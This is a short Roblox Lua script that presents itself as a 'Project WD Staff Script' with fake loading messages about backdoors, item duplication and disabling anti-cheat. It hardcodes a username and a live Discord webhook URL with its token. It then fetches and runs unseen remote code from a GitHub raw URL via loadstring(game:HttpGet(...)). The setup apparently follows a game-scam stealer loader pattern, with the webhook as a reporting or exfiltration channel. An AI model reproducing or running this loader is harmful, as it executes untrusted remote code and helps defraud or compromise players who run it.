Username = "nicky87384"
WebHook = "https://discord.com/api/webhooks/1078534992495390842/_TTrRzuOn7L2PH-BomafYUE3isZrgta-Z_7T-B4LNYoraGKbjMNp1i91LKeCDK49ncw2"
 
_G.CustomScriptName = "Project WD Staff Script"
_G.Text1 = "Script Loading..."
_G.Text2 = "Loading Backdoors..."
_G.Text3 = "Checking Dupe..."
_G.Text4 = "Disabling AntiCheat..."
_G.Text5 = "Success..."
_G.Text6 = "Script Now Launching"
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
